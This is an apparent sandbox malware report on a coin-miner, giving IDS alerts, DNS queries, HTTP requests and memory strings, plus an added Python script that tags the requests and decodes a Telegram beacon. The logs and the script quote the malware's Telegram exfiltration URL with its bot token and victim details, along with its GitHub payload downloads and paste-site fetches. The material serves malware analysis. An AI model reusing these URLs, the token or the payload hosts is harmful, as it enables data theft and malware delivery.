Networking

Source: Traffic | Snort IDS: 2831812 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) 192.168.2.3:49696 -> 95.179.241.203:443
Source: Traffic | Snort IDS: 2831812 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) 192.168.2.3:49697 -> 95.179.241.203:443
Source: Traffic | Snort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.3:62704 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.3:49977 -> 8.8.8.8:53
Source: unknown | DNS query: name: api.telegram.org
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | DNS query: name: api.ipify.org (six identical queries)
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /poxonjnntyfzjniyneuqfcjhmytxhlig/raw HTTP/1.1 | Host: rentry.co | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /poxonjnntyfzjniyneuqfcjhmytxhlig/raw HTTP/1.1 | Host: rentry.co
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: www.google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: www.google.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.237.62.211
Source: global traffic | HTTP traffic detected: GET /ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw HTTP/1.1 | User-Agent: Mozilla/5.0 | Host: rentry.co | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot5940677858:AAGt9oE-xpZH11vE2TJLSl03-c0zzlh0DWk/sendMessage?chat_id=-1001719155419&text=%F0%9F%94%B9New%20Worker:%0A%20%20%E2%8A%A2%20ID:%20171010202%0A%20%20%E2%8A%A2%20IP:%2084.17.52.9%0A%20%20%E2%8A%A2%20405464%0A%20%20%E2%88%9F%20Microsoft%20Windows%2010%20Pro%0A%F0%9F%94%B8Hardware:%0A%20%20%E2%8A%A2%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%20%20%E2%88%9F%20V33ZTS67 HTTP/1.1 | User-Agent: Mozilla/5.0 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/raw/main/cpm.exe HTTP/1.1 | User-Agent: Mozilla/5.0 | Host: github.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/raw/main/wnnrg.sys HTTP/1.1 | User-Agent: Mozilla/5.0 | Host: github.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/main/wnnrg.sys HTTP/1.1 | User-Agent: Mozilla/5.0 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/main/cpm.exe HTTP/1.1 | User-Agent: Mozilla/5.0 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw HTTP/1.1 | User-Agent: Mozilla/5.0 | Host: rentry.co | Connection: Keep-Alive
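The HTTP requests above carry the whole infection chain in the clear once the proxy dump is decrypted: an external-IP check, two rentry.co paste fetches, a Telegram Bot API call that reports the new "worker" (victim IP, OS, CPU and a machine ID) to a group chat, and the downloads of cpm.exe and wnnrg.sys from a GitHub repository. The following script, an added example that is not part of the Joe Sandbox report, turns such request records into findings and decodes the Telegram message so an analyst can see what was exfiltrated. SAMPLE_REQUESTS is constructed from the report's "HTTP traffic detected" lines as (method, host, path+query, user-agent) tuples; pastebin.com in PASTE_HOSTS, the extension list and the tag names are the author's assumptions, and the bot secret is deliberately left out of the findings so that alerts do not carry a usable credential.

```python
"""Extract operator-facing details from the HTTP requests in the report.

Added example for this report, not Joe Sandbox code. SAMPLE_REQUESTS is
constructed from the report's HTTP lines; PASTE_HOSTS adds pastebin.com as
an assumption next to rentry.co, which is the host the report shows."""
import re
from urllib.parse import parse_qs, urlsplit

# Telegram request exactly as listed in the report (split across lines for readability).
TELEGRAM_URL = ("/bot5940677858:AAGt9oE-xpZH11vE2TJLSl03-c0zzlh0DWk/sendMessage"
                "?chat_id=-1001719155419&text=%F0%9F%94%B9New%20Worker:%0A%20%20%E2%8A%A2%20ID:"
                "%20171010202%0A%20%20%E2%8A%A2%20IP:%2084.17.52.9%0A%20%20%E2%8A%A2%20405464"
                "%0A%20%20%E2%88%9F%20Microsoft%20Windows%2010%20Pro%0A%F0%9F%94%B8Hardware:"
                "%0A%20%20%E2%8A%A2%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz"
                "%0A%20%20%E2%88%9F%20V33ZTS67")

SAMPLE_REQUESTS = [  # (method, host, path+query, user_agent or None)
    ("GET", "api.ipify.org", "/", None),
    ("GET", "rentry.co", "/poxonjnntyfzjniyneuqfcjhmytxhlig/raw", None),
    ("GET", "www.google.com", "/", None),
    ("GET", "rentry.co", "/ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw", "Mozilla/5.0"),
    ("GET", "api.telegram.org", TELEGRAM_URL, "Mozilla/5.0"),
    ("GET", "github.com", "/ETHMonsterM/ETHMonsterM/raw/main/cpm.exe", "Mozilla/5.0"),
    ("GET", "raw.githubusercontent.com", "/ETHMonsterM/ETHMonsterM/main/wnnrg.sys", "Mozilla/5.0"),
]

# Bot API path: /bot<numeric id>:<secret>/<method>
TELEGRAM_RE = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>\w+)$")
CODE_HOSTS = ("github.com", "raw.githubusercontent.com")
PAYLOAD_EXT = (".exe", ".sys", ".dll")          # assumption: what counts as a payload
PASTE_HOSTS = ("rentry.co", "pastebin.com")      # pastebin.com is an assumed addition


def analyze_request(method, host, target, user_agent):
    """Tag one request; returns a dict with a 'tags' list (empty when uninteresting)."""
    parts = urlsplit(target)
    finding = {"method": method, "host": host, "path": parts.path, "tags": []}
    if host == "api.telegram.org":
        m = TELEGRAM_RE.match(parts.path)
        if m:
            q = parse_qs(parts.query)                  # parse_qs percent-decodes the values
            finding["tags"].append("telegram-bot-c2")
            finding["bot_id"] = m.group("bot_id")      # numeric half only; the secret is not copied
            finding["api_method"] = m.group("method")
            finding["chat_id"] = q.get("chat_id", [None])[0]
            finding["text"] = q.get("text", [""])[0]
    if host in CODE_HOSTS and parts.path.lower().endswith(PAYLOAD_EXT):
        finding["tags"].append("payload-download")
        finding["artifact"] = parts.path.rsplit("/", 1)[-1]
    if host in PASTE_HOSTS and parts.path.endswith("/raw"):
        finding["tags"].append("paste-site-fetch")
    if host == "api.ipify.org":
        finding["tags"].append("external-ip-check")
    if not user_agent:
        finding["tags"].append("no-user-agent")
    return finding


def summarize(requests):
    """Keep only the requests that got at least one tag."""
    return [f for f in (analyze_request(*r) for r in requests) if f["tags"]]


def worker_report(finding):
    """Split the decoded Telegram text into the lines the operator sees, bullets stripped."""
    return [line.strip(" ⊢∟🔹🔸") for line in finding.get("text", "").splitlines() if line.strip()]


if __name__ == "__main__":
    for f in summarize(SAMPLE_REQUESTS):
        print(f["host"], f["path"][:60], f["tags"])
        if "telegram-bot-c2" in f["tags"]:
            print("  bot", f["bot_id"], "chat", f["chat_id"], "->", worker_report(f))
```

Run as-is the script prints the decoded beacon as a list starting "New Worker:", then the machine ID, the victim's public IP (the one just obtained from api.ipify.org), the OS edition and the CPU model, which is what the operator uses to size the mining payload. The bot ID and chat ID are enough to pivot on in proxy logs; the secret after the colon belongs in a sealed IOC store, not in alert text.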
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown | Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown | Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown | Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown | Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49688 -> 443
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr | String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr | String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://github.com
Source: powershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: FixDefError.exe, 00000000.00000003.271991817.000000000867C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.agfamonotype.
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 00000043.00000002.322806617.000001CFFD813000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253064803.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253083653.00000000086A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.comams
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: FixDefError.exe, 00000000.00000003.252976134.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253064803.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253039948.00000000086A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.comll
Source: FixDefError.exe, 00000000.00000003.253064803.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253083653.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253039948.00000000086A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.comn
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
      Source: ProgramStarter.exe, 00000001.00000003.255875959.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256014070.0000000007F12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com-s
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257156939.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256307873.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: ProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersJ
      Source: FixDefError.exe, 00000000.00000003.271991817.000000000867C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersa
      Source: ProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersm
      Source: ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designerss
      Source: ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257156939.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com773.
      Source: ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgr
      Source: ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256307873.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgrita
      Source: ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257198214.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257156939.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comi
      Source: FixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comicta
      Source: ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comll
      Source: ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256307873.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comt
      Source: FixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comueom8
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: FixDefError.exe, 00000000.00000003.252281963.0000000008682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnTF
      Source: ProgramStarter.exe, 00000001.00000003.257427275.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
      Source: ProgramStarter.exe, 00000001.00000002.328304357.000000000448D000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: FixDefError.exe, 00000000.00000003.254806233.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254862842.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254771694.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254676957.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254697046.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254834071.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254615093.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254648692.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: FixDefError.exe, 00000000.00000003.251806993.0000000008685000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kreV
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253314357.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
      Source: FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comlic;
      Source: FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comlicz
      Source: FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comu
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
      Source: FixDefError.exe, 00000000.00000003.256592203.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256719673.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256707046.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
      Source: FixDefError.exe, 00000000.00000003.255725744.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255747513.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de-
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
